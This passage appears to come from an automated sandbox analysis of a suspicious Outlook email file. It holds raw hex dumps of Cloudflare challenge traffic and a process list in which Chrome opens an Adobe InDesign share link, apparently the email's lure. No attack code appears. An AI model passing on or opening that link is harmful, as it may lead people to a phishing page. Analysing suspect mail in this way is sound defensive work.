                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:43 UTC1435INData Raw: 04 c9 e1 fc 46 85 ba f9 92 51 9d f7 ce 2e 89 f5 f6 20 82 f5 ff 20 82 f5 ff 22 83 f5 ff 36 8e f6 ec 5f a5 f7 be 98 c5 fa 7e e0 ee fd 2a ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff
                                                                                                                                                                                                                                                                                                              Data Ascii: FQ. "6_~*
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:43 UTC1437INData Raw: ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff
                                                                                                                                                                                                                                                                                                              Data Ascii:
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:43 UTC1438INData Raw: 61 39 39 0d 0a 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff
                                                                                                                                                                                                                                                                                                              Data Ascii: a99
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:43 UTC1439INData Raw: 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff
                                                                                                                                                                                                                                                                                                              Data Ascii:
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:43 UTC1441INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                                                              98192.168.2.1649816104.17.3.184443C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:43 UTC1441OUTGET /cdn-cgi/challenge-platform/h/g/i/81bbd40e1eca59f1/1698251262357/QOccPTjuoc1pb_7 HTTP/1.1
                                                                                                                                                                                                                                                                                                              Host: challenges.cloudflare.com
                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                                                              Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/scl0v/0x4AAAAAAALzWnvdFcCpJJ1T/auto/normal
                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9


                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                                                              99104.17.3.184443192.168.2.1649816C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:43 UTC1441INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                              Date: Wed, 25 Oct 2023 16:27:43 GMT
                                                                                                                                                                                                                                                                                                              Content-Type: image/png
                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                                                                                              CF-RAY: 81bbd41dfca220a5-IAD
                                                                                                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:43 UTC1441INData Raw: 33 64 0d 0a 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 2d 00 00 00 60 08 02 00 00 00 06 be 6c 7f 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82 0d 0a
                                                                                                                                                                                                                                                                                                              Data Ascii: 3dPNGIHDR-`lIDAT$IENDB`
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:43 UTC1442INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                                                                              050100s020406080100

                                                                                                                                                                                                                                                                                                              Click to jump to process

                                                                                                                                                                                                                                                                                                              050100s0.0050100MB

                                                                                                                                                                                                                                                                                                              Click to jump to process

                                                                                                                                                                                                                                                                                                              • File
                                                                                                                                                                                                                                                                                                              • Registry

                                                                                                                                                                                                                                                                                                              Click to dive into process behavior distribution

                                                                                                                                                                                                                                                                                                              Target ID:0
                                                                                                                                                                                                                                                                                                              Start time:18:27:06
                                                                                                                                                                                                                                                                                                              Start date:25/10/2023
                                                                                                                                                                                                                                                                                                              Path:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                                                                                                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                              Commandline:C:\Program Files (x86)\Microsoft Office\Root\Office16\OUTLOOK.EXE" /f "C:\Users\user\Desktop\EXTERNAL DESERT FORREST NURSERY LLC.msg
                                                                                                                                                                                                                                                                                                              Imagebase:0x6d0000
                                                                                                                                                                                                                                                                                                              File size:34'446'744 bytes
                                                                                                                                                                                                                                                                                                              MD5 hash:91A5292942864110ED734005B7E005C0
                                                                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                              Reputation:moderate
                                                                                                                                                                                                                                                                                                              Has exited:false
                                                                                                                                                                                                                                                                                                              There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                                                                                                                                                                                                                                                                              There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                                                                                                                                                                                                                                                                              There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                                                                                                                                                                                                                                                                              There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                                                                                                                                                                                                                                                                              There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

                                                                                                                                                                                                                                                                                                              Target ID:2
                                                                                                                                                                                                                                                                                                              Start time:18:27:09
                                                                                                                                                                                                                                                                                                              Start date:25/10/2023
                                                                                                                                                                                                                                                                                                              Path:C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe
                                                                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                              Commandline:C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe" "514C220F-94D1-4724-9DCA-610A81398BDA" "87AE37A8-E611-4D04-A8FC-53B3877F621D" "4076" "C:\Program Files (x86)\Microsoft Office\Root\Office16\OUTLOOK.EXE" "WordCombinedFloatieLreOnline.onnx
                                                                                                                                                                                                                                                                                                              Imagebase:0x7ff6596e0000
                                                                                                                                                                                                                                                                                                              File size:710'048 bytes
                                                                                                                                                                                                                                                                                                              MD5 hash:EC652BEDD90E089D9406AFED89A8A8BD
                                                                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                              Reputation:moderate
                                                                                                                                                                                                                                                                                                              Has exited:false

                                                                                                                                                                                                                                                                                                              Target ID:3
                                                                                                                                                                                                                                                                                                              Start time:18:27:14
                                                                                                                                                                                                                                                                                                              Start date:25/10/2023
                                                                                                                                                                                                                                                                                                              Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                              Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://indd.adobe.com/view/e174e561-569a-48e3-8548-c6c6e174aa25
                                                                                                                                                                                                                                                                                                              Imagebase:0x7ff71e7f0000
                                                                                                                                                                                                                                                                                                              File size:3'242'272 bytes
                                                                                                                                                                                                                                                                                                              MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                                                                                                                              Has exited:false

                                                                                                                                                                                                                                                                                                              Target ID:4
                                                                                                                                                                                                                                                                                                              Start time:18:27:14
                                                                                                                                                                                                                                                                                                              Start date:25/10/2023
                                                                                                                                                                                                                                                                                                              Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                              Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2008 --field-trial-handle=1952,i,18191314582763280315,6070070220069831171,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                                                                                                                                                                                                                                              Imagebase:0x7ff71e7f0000
                                                                                                                                                                                                                                                                                                              File size:3'242'272 bytes
                                                                                                                                                                                                                                                                                                              MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                                                                                                                              Has exited:false

                                                                                                                                                                                                                                                                                                              No disassembly